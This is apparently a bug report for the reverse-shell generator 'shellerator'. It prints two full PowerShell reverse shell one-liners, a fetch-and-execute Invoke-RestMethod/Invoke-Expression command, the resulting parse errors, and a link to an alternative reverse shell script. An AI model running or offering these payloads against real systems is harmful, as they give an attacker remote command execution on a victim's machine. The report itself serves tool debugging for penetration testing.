shellerator
shellerator copied to clipboard
Published
20 hours ago •
ShutdownRepo
ShutdownRepo
[BUG] Powershell reverseshell does not work
Both generated powershell reverse shells do not work:
I used the following command to generate the reverse shells:
# shellerator --type powershell --lport 443 --lhost 127.0.0.1
[1] powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("127.0.0.1",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
[2] powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
CLI command used
/root/.local/bin/shellerator --reverse-shell --type powershell --lhost 127.0.0.1 --lport 443
Running them on a windows host yields a lot of syntax errors:
> Invoke-RestMethod '127.0.0.1/rev1.ps1' | Invoke-Expression
At line:1 char:75
+ ... System.Net.Sockets.TCPClient('127.0.0.1',443); = .GetStream();[byte[ ...
+ ~
An expression was expected after '('.
At line:1 char:122
+ ... = .GetStream();[byte[]] = 0..65535|%{0};while(( = .Read(, 0, .Length ...
+ ~
Missing expression after ','.
At line:1 char:123
+ ... tream();[byte[]] = 0..65535|%{0};while(( = .Read(, 0, .Length)) -ne 0 ...
+ ~~~~~~~
Unexpected token '.Length' in expression or statement.
At line:1 char:122
+ ... = .GetStream();[byte[]] = 0..65535|%{0};while(( = .Read(, 0, .Length ...
+ ~
Missing closing ')' in expression.
At line:1 char:132
+ ... eam();[byte[]] = 0..65535|%{0};while(( = .Read(, 0, .Length)) -ne 0){ ...
+ ~
Missing statement body in while loop.
At line:1 char:138
+ ... byte[]] = 0..65535|%{0};while(( = .Read(, 0, .Length)) -ne 0){; = (Ne ...
+ ~
Unexpected token ')' in expression or statement.
At line:1 char:203
+ ... = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(,0, ); = ...
+ ~
Missing ')' in method call.
At line:1 char:206
+ ... New-Object -TypeName System.Text.ASCIIEncoding).GetString(,0, ); = (i ...
+ ~
Missing expression after ',' in pipeline element.
At line:1 char:139
+ ... yte[]] = 0..65535|%{0};while(( = .Read(, 0, .Length)) -ne 0){; = (New ...
+ ~
Missing closing '}' in statement block or type definition.
At line:1 char:207
+ ... w-Object -TypeName System.Text.ASCIIEncoding).GetString(,0, ); = (iex ...
+ ~
Unexpected token ')' in expression or statement.
Not all parse errors were reported. Correct the reported errors and try again.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : ExpectedExpression
Fix: Use a working reverse shell like this one:
https://gist.githubusercontent.com/egre55/c058744a4240af6515eb32b2d33fbed3/raw/3ad91872713d60888dca95850c3f6e706231cb40/powershell_reverse_shell.ps1
